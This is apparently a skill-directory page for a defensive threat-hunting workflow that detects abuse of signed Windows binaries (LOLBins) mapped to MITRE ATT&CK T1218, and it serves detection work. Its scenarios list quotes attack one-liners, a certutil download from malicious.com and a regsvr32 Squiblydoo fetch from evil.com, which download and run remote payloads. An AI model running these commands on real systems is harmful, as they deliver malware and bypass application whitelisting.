hunting-for-living-off-the-land-binaries
Proactively hunt for adversary abuse of legitimate system binaries (LOLBins) to execute malicious payloads while evading detection.
Best use case
hunting-for-living-off-the-land-binaries is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Proactively hunt for adversary abuse of legitimate system binaries (LOLBins) to execute malicious payloads while evading detection.
Teams using hunting-for-living-off-the-land-binaries should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/hunting-for-living-off-the-land-binaries/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How hunting-for-living-off-the-land-binaries Compares
| Feature / Agent | hunting-for-living-off-the-land-binaries | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Proactively hunt for adversary abuse of legitimate system binaries (LOLBins) to execute malicious payloads while evading detection.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Hunting for Living-off-the-Land Binaries (LOLBins) ## When to Use - When investigating fileless malware campaigns that bypass traditional AV - During proactive threat hunts targeting defense evasion techniques - When EDR alerts fire on legitimate binaries executing unusual child processes - After threat intelligence reports indicate LOLBin abuse in active campaigns - During red team/purple team exercises validating detection coverage for T1218 ## Prerequisites - Access to EDR telemetry (CrowdStrike, Microsoft Defender for Endpoint, SentinelOne) - SIEM with process creation logs (Sysmon Event ID 1, Windows Security 4688) - Familiarity with LOLBAS Project (lolbas-project.github.io) reference list - PowerShell command-line logging enabled (Module Logging, Script Block Logging) - Network proxy or firewall logs for correlating outbound connections ## Workflow 1. **Define Hunt Hypothesis**: Formulate a hypothesis based on threat intel (e.g., "Adversaries are using certutil.exe to download second-stage payloads from external domains"). 2. **Identify Target LOLBins**: Select specific binaries from the LOLBAS Project database to hunt for, prioritizing those matching current threat landscape (certutil, mshta, rundll32, regsvr32, msiexec, wmic, cmstp, bitsadmin). 3. **Collect Process Telemetry**: Query EDR or SIEM for process creation events involving target LOLBins with unusual command-line arguments, parent processes, or execution contexts. 4. **Baseline Normal Behavior**: Establish what legitimate usage looks like for each LOLBin in your environment by analyzing historical frequency, typical parent processes, and standard arguments. 5. **Identify Anomalies**: Compare current telemetry against baselines, flagging executions with network connections, encoded commands, unusual file paths, or abnormal parent-child process chains. 6. **Correlate and Enrich**: Cross-reference anomalous LOLBin activity with network logs, DNS queries, file creation events, and threat intelligence feeds. 7. **Document and Report**: Record findings, update detection rules, and create IOC lists for identified malicious LOLBin usage. ## Key Concepts | Concept | Description | |---------|-------------| | LOLBin | Legitimate OS binary abused by attackers for malicious purposes | | LOLBAS Project | Community-curated list of Windows LOLBins, LOLLibs, and LOLScripts | | T1218 | MITRE ATT&CK - Signed Binary Proxy Execution | | T1218.001 | Compiled HTML File (mshta.exe) | | T1218.002 | Control Panel (control.exe) | | T1218.003 | CMSTP | | T1218.005 | Mshta | | T1218.010 | Regsvr32 | | T1218.011 | Rundll32 | | T1197 | BITS Jobs (bitsadmin.exe) | | T1140 | Deobfuscate/Decode Files (certutil.exe) | | Proxy Execution | Using trusted binaries to execute untrusted code | | Fileless Attack | Attack that operates primarily in memory without dropping files | ## Tools & Systems | Tool | Purpose | |------|---------| | CrowdStrike Falcon | EDR telemetry and process tree analysis | | Microsoft Defender for Endpoint | Advanced hunting with KQL queries | | Splunk | SIEM log aggregation and SPL queries | | Elastic Security | Detection rules and timeline investigation | | Sysmon | Detailed process creation and network logging | | LOLBAS Project | Reference database of LOLBin capabilities | | Sigma Rules | Generic detection rule format for LOLBins | | Velociraptor | Endpoint forensic collection and hunting | ## Common Scenarios 1. **Certutil Download Cradle**: Adversary uses `certutil.exe -urlcache -split -f http://malicious.com/payload.exe` to download malware, bypassing web proxies that allow certutil traffic. 2. **Mshta HTA Execution**: Attacker delivers HTA file via email that executes VBScript payload through `mshta.exe`, which is a signed Microsoft binary. 3. **Rundll32 DLL Proxy Load**: Malicious DLL loaded via `rundll32.exe shell32.dll,ShellExec_RunDLL` to proxy execution through a trusted binary. 4. **Regsvr32 Squiblydoo**: Remote SCT file executed via `regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll` bypassing application whitelisting. 5. **BITSAdmin Persistence**: Adversary creates BITS transfer job to repeatedly download and execute payloads using `bitsadmin /transfer`. ## Output Format ``` Hunt ID: TH-LOLBIN-[DATE]-[SEQ] Hypothesis: [Stated hypothesis] LOLBins Investigated: [List of binaries] Time Range: [Start] - [End] Data Sources: [EDR, Sysmon, SIEM] Findings: - [Finding 1 with evidence] - [Finding 2 with evidence] Anomalies Detected: [Count] True Positives: [Count] False Positives: [Count] IOCs Identified: [List] Detection Rules Created/Updated: [List] Recommendations: [Next steps] ```
Related Skills
waddington-landscape
Waddington's epigenetic landscape: cell fate as gradient flow on potential surfaces, connecting developmental biology to dynamical systems, Schrödinger bridges, and fractional diffusion
performing-threat-landscape-assessment-for-sector
Conduct a sector-specific threat landscape assessment by analyzing threat actor targeting patterns, common attack vectors, and industry-specific vulnerabilities to inform organizational risk management.
performing-threat-hunting-with-yara-rules
Use YARA pattern-matching rules to hunt for malware, suspicious files, and indicators of compromise across filesystems and memory dumps. Covers rule authoring, yara-python scanning, and integration with threat intel feeds.
performing-threat-hunting-with-elastic-siem
Performs proactive threat hunting in Elastic Security SIEM using KQL/EQL queries, detection rules, and Timeline investigation to identify threats that evade automated detection. Use when SOC teams need to hunt for specific ATT&CK techniques, investigate anomalous behaviors, or validate detection coverage gaps using Elasticsearch and Kibana Security.
hunting-for-webshell-activity
Hunt for web shell deployments on internet-facing servers by analyzing file creation in web directories, suspicious process spawning from web servers, and anomalous HTTP patterns.
hunting-for-unusual-service-installations
Detect suspicious Windows service installations (MITRE ATT&CK T1543.003) by parsing System event logs for Event ID 7045, analyzing service binary paths, and identifying indicators of persistence mechanisms.
hunting-for-unusual-network-connections
Hunt for unusual network connections by analyzing outbound traffic patterns, rare destinations, non-standard ports, and anomalous connection frequencies from endpoints.
hunting-for-t1098-account-manipulation
Hunt for MITRE ATT&CK T1098 account manipulation including shadow admin creation, SID history injection, group membership changes, and credential modifications using Windows Security Event Logs.
hunting-for-suspicious-scheduled-tasks
Hunt for adversary persistence and execution via Windows scheduled tasks by analyzing task creation events, suspicious task properties, and unusual execution patterns that indicate T1053.005 abuse.
hunting-for-supply-chain-compromise
Hunt for supply chain compromise indicators including trojanized software updates, compromised dependencies, unauthorized code modifications, and tampered build artifacts.
hunting-for-startup-folder-persistence
Detect T1547.001 startup folder persistence by monitoring Windows startup directories for suspicious file creation, analyzing autoruns entries, and using Python watchdog for real-time filesystem monitoring.
hunting-for-spearphishing-indicators
Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.